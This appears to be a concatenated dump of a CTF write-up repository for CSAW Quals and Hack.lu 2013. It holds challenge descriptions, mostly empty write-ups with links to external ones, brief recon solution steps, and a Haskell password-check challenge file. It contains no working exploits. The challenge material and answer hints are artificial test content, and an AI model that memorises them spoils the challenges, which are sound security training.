> Evil hackers have taken control of the Nevernote server and locked me out. While I'm working on restoring access, is there any way you can get in to my account and save a copy of my notes? I know the system is super secure but if anybody can do it - it's you.
> Thanks,
> Nevernote Admin

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/alex-taylor.txt:
Alexander Taylor - 100 Points
Solved by 134 teams.

Alexander Taylor
https://www.google.com/search?&q=Alexander+Taylor

1) Grab photo from judges page
2) Strings/analyze
3) Notice unusual chunks
4) extract bogus ones
5) xor
6) ???
7) profit

--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/brandon-edwards.txt:
Brandon Edwards - 100 Points
Solved by 425 teams.

Brandon Edwards
https://www.google.com/search?&q=Brandon+Edwards

--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/historypeats.txt:
historypeats - 100 Points
Solved by 607 teams.

historypeats
https://www.google.com/search?&q=historypeats

--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/jordan-wiens.txt:
Jordan Wiens - 100 Points
Solved by 188 teams.

http://key.psifertex.com


1) key.psifertex.com contains: "Michael Vario sure does some suspicious signs, hope he doesn't do me"
2) Google "Michael Vario", see multiple results about weird PGP key signing he does.
3) Search jordan wiens on any public keyserver: http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x9FBEBC5EA827D636
4) 'getting warmer!' in gpg key name

5a) search for analyze pgp and follow http://www.macfreek.nl/memory/Analysing_PGP_Identities

or

5b) just import key into thunderbird. notice picture.

or

5c) search/import with gpg, then show the photo ID packet (`showphoto` inside `gpg --edit-key`, or `gpg --list-options show-photos --list-keys`)

--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/julian-cohen.txt:
Julian Cohen - 100 Points
Solved by 258 teams.

Julian Cohen
https://www.google.com/search?&q=Julian+Cohen


--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/kevin-chung.txt:
Kevin Chung - 100 Points
Solved by 292 teams.

Kevin Chung
https://www.google.com/search?&q=Kevin+Chung

1) add 'security' or 'poly' to kevin's search:
2) find codekevin.com
3) shows hint that no key there, but references 'graduation'
4) https://www.google.com/search?&q=Kevin+Chung+high+school
5) Page 3 finds: https://hsf.isis.poly.edu/previous_winners
6) Which points to: https://hsf.isis.poly.edu/assets/uploads/pages/previous_winners/key.txt

--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/odin.txt:
Odin - 100 Points
Solved by 165 teams.

Odin
https://www.google.com/search?&q=Odin

--------------------------------------------------------------------------------
/csaw-quals-2013/web/recon/theodore-reed.txt:
Theodore Reed - 100 Points
Solved by 115 teams.

http://prosauce.org

--------------------------------------------------------------------------------
/csaw-quals-2013/web/widgetcorp-400/README.md:
# CSAW Quals CTF 2013: WidgetCorp

**Category:** Web
**Points:** 400
**Solves:** 99
**Description:**

> http://128.238.66.224

## Write-up

(TODO)

## Other write-ups and resources

* none yet

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/README.md:
# Hack.lu CTF 2013 write-ups

*
* [Scoreboard](https://ctf.fluxfingers.net/2013/scoreboard)

## Completed write-ups

* none yet

## External write-ups only

* [Beer Pump Filtration](misc/Beer-Pump-Filtration)
* [BREW'r'Y](crypto/BREW-r-Y)
* [ECKA](crypto/ECKA)
* [ELF](reversing/ELF)
* [FluxArchiv (Part 1)](reversing/FluxArchiv-Part1)
* [FluxArchiv (Part 2)](reversing/FluxArchiv-Part2)
* [Geier's Lambda](crypto/Geier-s-Lambda)
* [Geolocation Flag](misc/Geolocation-Flag)
* [Marvin is plain-Jane](crypto/Marvin-is-plain-Jane)
* [Packed](internals/Packed)
* [Pay TV](web/Pay-TV)
* [RoboAuth](reversing/RoboAuth)
* [Roboparty](misc/Roboparty)
* [Robot Plans](internals/Robot-Plans)
* [Robotic Superiority](exploiting/Robotic-Superiority)
* [Robots Exclusion Committee](web/Robots-Exclusion-Committee)
* [Wannabe](exploiting/Wannabe)
* [What's wrong with this?](internals/What-s-wrong-with-this)

## Missing write-ups

* [Breznparadisebugmaschine](exploiting/Breznparadisebugmaschine)
* [For whom the bell tolls](misc/For-whom-the-bell-tolls)
* [OTP](misc/OTP)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/BREW-r-Y/README.md:
# Hack.lu CTF 2013: BREW'r'Y

**Category:** Crypto
**Points:** 350
**Author:** dwuid
**Description:**

> Finally, the robots managed to sneak into one of our breweries. I guess I won't have to explain how bad that really is. That darn non-physical ones even shut down our login system. Shiny thing, advanced technology, all based on fingerprints. Been secure as hell. If only it was running. Well, basically, we're screwed.
> But wait, there's hope. Seems like they didn't shut down our old login system. Backward compatibility's a bitch, eh? Unfortunately, we got like _zero_ knowledge about the protocol. I mean come on, the last time we used that thingy was like decades ago. If we are lucky, the old authentication method is buggy.
> So, I heard you're kinda smart? Have a look at it. We desperately need to get drunk^W supply. You'll find the old system at ctf.fluxfingers.net:1335. Good luck.
>
> Hint: Data is - and is expected to be - compressed using zlib.
> Hint: The challenge text gives hints about the protocol involved. We updated it in order to reflect that fact.

## Write-up

None

## Other write-ups and resources

* [More Smoked Leet Chicken](http://mslc.ctf.su/wp/hack-lu-2013-ctf-crypto-350-brewry)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/ECKA/README.md:
# Hack.lu CTF 2013: ECKA

**Category:** Crypto
**Points:** 100
**Author:** asante
**Description:**

> Hey you!
> Come over and help me, please. We discovered a strange key agreement protocol used on this server: ctf.fluxfingers.net:1330.
> They send a curve which they use later.
But we think the robots are a bit UBER-cautious and do not use the curve's P. So they first exchange their public point with a technique we could not figure out. It looks like they do not need a public key for this step. 11 | > Afterwards they use another technique to agree on a key which they ultimately use to send some encrypted password. 12 | > 13 | > We need this last password to shut down the robo-factory on our way to the Oktoberfest. 14 | > 15 | > Oh btw, the robots use AES-ECB for symmetric encryption. 16 | > 17 | > Hint: He, we have the latest news for you. The first part of their strange key agreement was designed by the famous SHA-Robot Мир! 18 | > For all robo hunters out there: Your quest-description was updated - check it! 19 | 20 | ## Write-up 21 | 22 | None 23 | 24 | ## Other write-ups and resources 25 | 26 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-ecka](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-ecka) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/crypto/Geier-s-Lambda/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Geier's Lambda 2 | 3 | **Category:** Crypto 4 | **Points:** 200 5 | **Author:** asante 6 | **Description:** 7 | 8 | > Hey! 9 | > We need your help. Our agent found some details about a huge conspiracy. Looks like they wanna plant a bomb near the Oktoberfest's main fairground ride. But we have a good chance, to get the defusing-password. That's where you have to jump in. We managed to steal the encrypted password along with a decryption file. Our agent also started to work on it, but one of the robots caught him and now we are left-behind with his infos. 10 | > 11 | > He found a collision on the real password but wasn't sure, if he can use that one. But, here is it: “Le1sRI6I” - perhaps you have better luck. 
> He also found out that the robots only use alphanumeric characters and that the collision is of the same length as the real password. The last thing he told us is that the defusing password must contain only printable characters.
>
> Hope that helps you! And now hurry!
>
> Here is your challenge: [pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs](pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs)

## Write-up

None

## Other write-ups and resources

* [http://balidani.blogspot.pt/2013/10/hacklu-ctf-crypto-200-geiers-lambda.html](http://balidani.blogspot.pt/2013/10/hacklu-ctf-crypto-200-geiers-lambda.html)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/Geier-s-Lambda/pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs:
--------------------------------------------------------------------------------
#!/usr/bin/runhaskell
{-# LANGUAGE NoMonomorphismRestriction #-}

import Data.Bits
import Data.Char
import Data.Word
import System.Environment
import Numeric

-- known Collision: "Le1sRI6I"

-- The encrypted 64-bit value; it is decrypted with a key derived from the
-- password given on the command line.
flag = 0xce97a7b6d709fb62

-- Usage: ./pwd_check.hs <password>  (prints the decrypted 64-bit value)
main = p =<< getArgs
  where p (pwd:_) = print $ dec flag $ toKey pwd
        p _       = return ()

-- Adler-32-like running sums over the password bytes (no modulus), packed
-- as (b << 16) | a. This is the function the known collision refers to;
-- main does not call it.
hash :: String -> Word32
hash = fromIntegral . (\(a,b) -> (b `shift` 16) .|. a) . foldl r (1, 0)
  where r = \(a,b) x -> (a + (ord x .&. 0xff), (a + (ord x .&. 0xff) + b))

-- TEA-style Feistel decryption of the two 32-bit halves of v: 32 rounds,
-- round sum starting at 0xC6EF3720 and decremented by d each round, with
-- the single key word k used in place of all four TEA subkeys.
dec :: Word64 -> Word32 -> Word64
dec v k = fin $ foldl r (3337565984, v0, v1) [0..31]
  where
    v0 = fromIntegral v :: Word32
    v1 = fromIntegral $ v `shiftR` 32 :: Word32
    s' = \a -> a - d
    r  = \(s,x,y) _ -> let y' = update y x s k (-)
                           x' = update x y' s k (-)
                       in (s' s, x', y')

-- One TEA half-round: f a (((b<<4)+d) xor (b+c) xor ((b>>5)+d)); f is (-) here.
update = \a b c d f -> f a (((b `shift` 4) + d) `xor` (b + c) `xor` ((b `shiftR` 5) + d))

-- Reassemble the halves: y becomes the high 32 bits, x the low 32 bits.
fin = \(_,x,y) -> fromIntegral y `shiftL` 32 .|. (fromIntegral x .&. 0xffffffff)

-- Hex-encode the password (showHex emits no leading zero for bytes < 0x10) ...
toHexStr s = concat $ "0x" : map (flip showHex "" . ord) s

-- ... and read its first 8 hex digits as the 32-bit key.
toKey s = k0
  where
    s' = toHexStr s
    k0 = read ("0x" ++ (take 8 $ drop 2 s')) :: Word32

-- TEA's delta constant, 0x9E3779B9.
d = 2654435769

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/crypto/Marvin-is-plain-Jane/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Marvin is plain-Jane

**Category:** Crypto
**Points:** 100
**Author:** asante
**Description:**

> Hey mister super-duper robo-dabster. We need you to tell us what Marvin is!
>
> What we know:
>
> Marvin is
> using brainpool p256r1.
> His friend is called meneze or something. Or was it van-stone?
>
> What we heard:
>
> (23372093078317551665216159139784413411806753229249201681647388827754827452856 : 1)
> 71164450240897430648972143714791734771985061339722673162401654668605658194656
> 12951693517100633909800921421096074083332346613461419370069191654560064909824
> What we need to know:
>
> What Marvin is

## Write-up

None

## Other write-ups and resources

* [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-marvin-is-plain-jane](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-marvin-is-plain-jane)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Breznparadisebugmaschine

**Category:** Exploiting
**Points:** 500
**Author:** martin, flandy
**Description:**

> The robot forces modified our beloved Breznparadisebackmaschine. This machine stores our secret, traditional Brezn recipe. Yet, we forgot the last secret ingredient and cannot access the Breznparadisebackmaschine anymore. However, Brezn are crucial for our party, as only paradise Brezn provide us the nice and warm feeling in our guts.
>
> We need you to recover the important ingredient! Here is everything we could remember from the recipe:
>
> For The Dough
> 1 kg Plain White Flour (around 9 - 12 % protein)
> 260 ml milk (lukewarm)
> 260 ml water (lukewarm)
> 80 g Butter (unsalted)
> 1 tbsp malt extract (liquid or dried, or brown sugar)
> 2 tsp fast action dried yeast (or 42g fresh if using)
> 2 tbsp Salt (unrefined)
> For The Finishing Solution
> 1 L Water
> 3 tbsp Baking Soda (or lye if you're using it)
> Secret Ingredient
>
> Please, we need to know that ingredient to make everyone happy again!
> [Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe](Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe)
> ctf.fluxfingers.net:1340
> Brezelparadisebackmaschinefirmware: Windows 2012
>
> Announcements:
> Ah, perhaps it helps you to know that our Breznparadisebugmaschinefirmware is up to date with Windows 2012.

## Write-up

None

## Other write-ups and resources

None

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Robotic-Superiority/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Robotic Superiority

**Category:** Exploiting
**Points:** 250
**Author:** lama
**Description:**

> Help us fight the evil robotic lieutenant Don Sim. He wants to spread robo propaganda to cover his actions on the Oktoberfest. But he needs good video footage for that. So he created an IRC bot that collects information about robots in movies. Robotic emancipation can NOT happen, you have to stop him! All we need is his private key. Our agents located the bot, here is all we know about it:
>
> Server: irc://ctf.fluxfingers.net:1313
> Bot: lib[1-5] (load balancer)
> Key: /var/private/key.txt
>
> Hint: All available commands are listed with "help". 3 connections allowed per IP.

## Write-up

None

## Other write-ups and resources

* [http://secgroup.ext.dsi.unive.it/2013/10/25/hack-lu-2013-ctf-write-up-robotic-superiority](http://secgroup.ext.dsi.unive.it/2013/10/25/hack-lu-2013-ctf-write-up-robotic-superiority)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/exploiting/Wannabe/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Wannabe

**Category:** Exploiting
**Points:** 400
**Author:** r1cky
**Description:**

> One of our informants met a guy who calls himself Elite Arthur; he is a real jackass, and he thinks he is the best hacker alive. We got reason to believe that the robots hired him to write the firmwares for their weapons. But to write such a firmware we need the key to sign the code.
> Luckily for us, our informant also found his website: …. Your job is to hack the server, find the flag and show this little cocksucker how skilled he really is. We count on you.
> Here is your challenge: https://ctf.fluxfingers.net:1317. Alternatively, you can reach the challenge without a reverse proxy but also without SSL here: http://ctf.fluxfingers.net:1339
>
> Announcement: Okay you can stop struggling now: XSS is not the way; leave the http cookie alone; get RIP to do the final trick!

## Write-up

None

## Other write-ups and resources

* [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-wannabe](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-wannabe)
* [https://www.arneswinnen.net/2013/11/hack-lu-2013-ctf-wannabe-writeup-part-one-web-exploitation](https://www.arneswinnen.net/2013/11/hack-lu-2013-ctf-wannabe-writeup-part-one-web-exploitation)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/Packed/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Packed

**Category:** Internals
**Points:** 200
**Author:** freddyb
**Description:**

> We just found a dead robot. It seems there is some useful data left but somehow it got confused with other data and now we don't know what's useful and what's junk. We just know there is only one way to go but there are many dead ends.
> Here is the challenge: [packed_7245b354be136111061c9a118d6304598f46c767](packed_7245b354be136111061c9a118d6304598f46c767)
>
> Announcements:
> Think outside the box - being several types at once like an animal that can change its color. Excuse the inaccuracy, but that's what you're searching for.

## Write-up

None

## Other write-ups and resources

* [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-internals-200-packed-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-internals-200-packed-write-up)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/Robot-Plans/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Robot Plans

**Category:** Internals
**Points:** 150
**Author:** DrunkenPanda
**Description:**

> We have captured a robot from behind, while he dropped some cooling liquid into the bushes. We tried to interrogate the robot, but he still refuses to speak. Luckily we could extract files from the android's communication module. Hopefully we get some information about the robots' motives, before all the information is swiped away...
> Here is the challenge: [https://ctf.fluxfingers.net/static/downloads/max_404/image.tar.gz](https://ctf.fluxfingers.net/static/downloads/max_404/image.tar.gz)

## Write-up

None

## Other write-ups and resources

* [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-robot-plans](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-robot-plans)
* [https://thufirhowatt.wordpress.com/hack-lu-ctf-robot-plans-writeup](https://thufirhowatt.wordpress.com/hack-lu-ctf-robot-plans-writeup)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/What-s-wrong-with-this/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: What's wrong with this?

**Category:** Internals
**Points:** 250
**Author:** javex
**Description:**

> We managed to get this package off the robots' servers.
> We managed to determine that it is some kind of compiled bytecode. But something is wrong with it. Our usual analysis failed - so we have to hand this over to you pros. We only know this: The program takes one parameter and it responds with "Yup" if you have found the secret code, with "Nope" otherwise. We expect it should be obvious how to execute it.
> Here is the challenge: [hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz](hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz)

## Write-up

None

## Other write-ups and resources

* [http://secgroup.ext.dsi.unive.it/2013/10/27/hack-lu-2013-ctf-write-up-whats-wrong-with-this](http://secgroup.ext.dsi.unive.it/2013/10/27/hack-lu-2013-ctf-write-up-whats-wrong-with-this)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/What-s-wrong-with-this/hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/internals/What-s-wrong-with-this/hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Beer-Pump-Filtration/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Beer Pump Filtration

**Category:** Misc
**Points:** evaluated
**Author:** FluxFingers
**Description:**

> Our agents observed that the famous robot Bender is part of the robot forces. Somehow he looked pregnant but his big belly is now gone. We fear that they might have smuggled some of Bender's freshly brewed BenderBräu into our beer supplies.
> This is why we need brave women and men to test whether BenderBräu can cause severe damage to the human body or not, to avoid poisoning the whole party. But you have to test quickly! Everyone is thirsty!
>
> For testing you need to drink 0.5 liter of beer, preferably wheat beer, as fast as you can.
>
> Make a video of your brave tasting and hand it in. The video must contain a proof of the current date. Show us the totally secure and random Nonce "17" as well as your teamname written on... something. Also show us the closed beer bottle before, the empty one after the tasting, and prove that it is 0.5 liters.
>
> We will judge the score as follows:
>
> Score = 100 Points - Seconds it takes to drink the beer
>
> Bonus points for:
> Girls (Due to the law for gender equality we score women higher for the same effort)
> Dressing up like a robot or an Oktoberfest maid in her Dirndl
> Robo Dance
> Drinking Weizenbier (wheat beer)

## Write-up

None

## Other write-ups and resources

* [PPP](https://www.youtube.com/watch?v=Y473nQphv8Y)
* [BalalaikaCr3w](https://www.youtube.com/watch?v=Cl0dp4eL7qg)
* [Stratumauhuur](https://www.youtube.com/watch?v=hHoFBd5lpYY)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: For whom the bell tolls

**Category:** Misc
**Points:** 250
**Author:** Til
**Description:**

> To be frank, the impact partying robots had on the Oktoberfest in the recent years was disastrous.
> While the authorities have been able to downplay all recent incidents in the press (which habitually tends to blame visitors from the U.S., Australia, Cologne, and other places, where proper beer can only be found by the initiated), they can no longer deny the problem. Several public safety and law enforcement agencies have joined forces to spoil the robots' fun. They have planned a massive crackdown on our fun-seeking robotic friends. Time and location are currently being communicated together with a passphrase. Our organization, Robots on Rampage (RoR), is determined to stop them from stopping our annual beer-tasting event.
> A robot agent on location in Munich has detected a transmission between timestamp 2013-10-19-20:21:42 and 2013-10-19-20:21:43. The precise beginning of the transmission is unknown. The agent was unable to decrypt the message content. Being not the smartest agent, he also disposed of the message capture. In the following we were able to determine the sender location and the Forensic Analysis Robot Team (FART) was able to retrieve the session key and an initialization vector (IV). Judging from the memory fragments FART found, our best guess is that OpenSSL's AES implementation was used in one of the better modes to encrypt the communication. As the session key length is 128 bit, the long term key is most probably longer. Due to time constraints we strongly advise against trying to break it. We have less confidence in the humans' ability to design proper communication protocols and services, though. However, we need a human to attack their logic.
>
> We have no way to actively communicate with the server they use for coordination. However, we can give you access to one of the lawful interception wiretaps those humans built into all their equipment. A TCP connection to ctf.fluxfingers.net:1334 will give you a maximum of 60 seconds of traffic. We have also found active equipment of a human agent we can interact with. He seems to listen on ctf.fluxfingers.net:1333, but we have no idea what he does with the input, except that there is encrypted traffic.
>
> Update:
> Session key and IV can be downloaded here [bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2](bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2)
>
> Announcements
>
> Ruby Version 1.8.7
>
> New Hints appeared!
> RoR has determined that the human agent acts as a proxy and requests meeting place, time and password for others. We think the first message he sends serves to agree on a session key for the answer. RoR analysts have also been staring at pcaps a lot lately. We think that on port 1832 (which we can only monitor passively) we are observing a key establishment that follows the simple ISO/IEC 11770-2 Mechanism 1. However, on tcp/1333 our analysts say that marshalled Ruby DateTime objects are flying by. Not sure why anyone would do this, but given what we see on the other port, it makes sense (in a twisted way).

## Write-up

None

## Other write-ups and resources

None

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Geolocation-Flag/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Geolocation Flag

**Category:** Misc
**Points:** -
**Author:** javex
**Description:**

> https://ctf.fluxfingers.net/2013/challenges/24
> This challenge is a special challenge. You can collect some minor extra points here by proving that you are a truly international player. Each time you visit your reference URL from a different country, that flag will be activated and you gain an additional point. You already have 0/222 points.
> This challenge cannot be solved in archive mode.
> Disclaimer: Please do not attempt to hack real-world systems for a single point. That is illegal and we assure you it is not worth a single point!

## Write-up

None

## Other write-ups and resources

* [http://thehackerblog.com/sneaky-methods-for-capturing-the-geolocation-flags-for-hack-lu-ctf](http://thehackerblog.com/sneaky-methods-for-capturing-the-geolocation-flags-for-hack-lu-ctf)
* [http://blog.0ops.net/blog/2013/10/27/hack-dot-lu-ctf-2013-misc-222-geolocation-flag](http://blog.0ops.net/blog/2013/10/27/hack-dot-lu-ctf-2013-misc-222-geolocation-flag)
* [http://nikaiw.io/scanning-the-internet-for-fun-and-country-flags-hack-lu](http://nikaiw.io/scanning-the-internet-for-fun-and-country-flags-hack-lu)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/OTP/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: OTP

**Category:** Misc
**Points:** 200
**Author:** SLAZ
**Description:**

> Some robots are on the Oktoberfest and want to take some tasty oil in a tent. But they hadn't reserved a table and all tents are full. No one gets access. They found a back entrance and managed to spy on the credentials while an employee entered them. They captured the username “admin” and password “supersafepw”. But the employee also entered a strange number (168335). As they were sure nobody's looking, they tried the captured data to get in the tent, but it didn't work. Help the robots to get their tasty tasty oil.
> (Or they have to build their own tent with blackjack and hookers)
> Here is your challenge: https://ctf.fluxfingers.net:1318

## Write-up

None

## Other write-ups and resources

None

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Roboparty/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: Roboparty

**Category:** Misc
**Points:** 300
**Author:** audioPhil
**Description:**

> Robot LHCH is happy. He made it into the castings for the tenth roman musical. He is even so happy that he went on the Oktoberfest to drink some beer. Unfortunately it seems that he drank too much so now he is throwing up part of his source code. Can you decipher the secret he knows?
> Warning: Viewing this page is not recommended for people who suffer from epilepsy. We are dead serious.
> And here is your totally eye-friendly challenge: https://ctf.fluxfingers.net/static/downloads/roboparty/index.html
>
> Hints:
> The flag starts with 'Y4Y,'
> It's neither Velato nor Fugue.

## Write-up

None

## Other write-ups and resources

* [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-roboparty](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-roboparty)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/ELF/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: ELF

**Category:** Reversing
**Points:** 400
**Author:** sqall
**Description:**

> We encountered a drunk human who had this binary file in his possession. We do not really understand the calculation which the algorithm does. And that is the problem.
> Can you imagine the disgrace we have to suffer, when we robots, based on logic, cannot understand an algorithm? Somehow it seems that the algorithm imitates their masters and behaves …. drunk! So let us not suffer this disgrace and reverse the algorithm and get the correct solution.
> Here is your challenge: [reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308](reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308)
>
> Announcements:
> Ok I think we got it (thanks to Happy-H from Team ClevCode). Ubuntu introduced a patch to disallow ptracing of non-child processes by non-root users. This changes the calculated value. So when you use Ubuntu you should work as root. The other distributions should not be affected. Anyway, I created a VM where the executable works just fine: http://h4des.org/ELF.ova (User: elf:elf and root:root)
>
> It seems that there are some problems with some Linux distributions that lead to a wrong flag. The flag is printable and is written in leet-speak. We are working on a VM that works correctly with this challenge. When the VM is ready, you can download it and try again. Sorry for the inconvenience.

## Write-up

None

## Other write-ups and resources

* [https://charliex2.wordpress.com/2013/10/24/hack-lu-ctf](https://charliex2.wordpress.com/2013/10/24/hack-lu-ctf)
* [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-elf](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-elf)
* [http://blog.frizn.fr/hacklu-2013/reverse-400-elf](http://blog.frizn.fr/hacklu-2013/reverse-400-elf)
* [http://h4des.org/blog/index.php?/archives/338-hack.lu-CTF-2013-ELF-400-Making-Of.html](http://h4des.org/blog/index.php?/archives/338-hack.lu-CTF-2013-ELF-400-Making-Of.html)
* [https://github.com/sqall01/ZwoELF](https://github.com/sqall01/ZwoELF)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/ELF/reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/ELF/reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: FluxArchiv (Part 1)

**Category:** Reversing
**Points:** 400
**Author:** sqall
**Description:**

> These funny humans try to exclude us from the delicious beer of the Oktoberfest! They made up a passcode for everyone who wants to enter the Festzelt. Sadly, our human informant friend could not learn the passcode for us. But he heard a conversation between two drunken humans, that they were using the same passcode for this intercepted archive file. They claimed that the format is absolutely secure and solves any kind of security issue.
> It's written by this funny hacker group named FluxFingers. Real jerks if you ask me. Anyway, it seems that the capability of drunken humans to remember things is limited. So they just used a 6 character passcode with only numbers and upper-case letters. So crack this passcode and get our ticket to their delicious German beer!
>
> Here is the challenge: [hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz](hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz)

## Write-up

None

## Other write-ups and resources

* [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-fluxarchivpart1-150.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-fluxarchivpart1-150.html)
* [http://big-daddy.fr/blog/?p=254](http://big-daddy.fr/blog/?p=254)
* [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv)
* [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up)
* [http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2](http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2)
* [http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html](http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html)

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz

--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/README.md:
--------------------------------------------------------------------------------
# Hack.lu CTF 2013: FluxArchiv (Part 2)

**Category:** Reversing
**Points:** 500
**Author:** sqall
**Description:**

> These sneaky humans! They do not just use one passcode, but two to enter the Festzelt. We heard that the passcode is hidden inside the archive file. It seems that the FluxFingers overrated their programming skill and had a major logical flaw in the archive file structure. Some of the drunken Oktoberfest humans found it and abused this flaw in order to transfer hidden messages. Find this passcode so we can finally drink their beer!
>
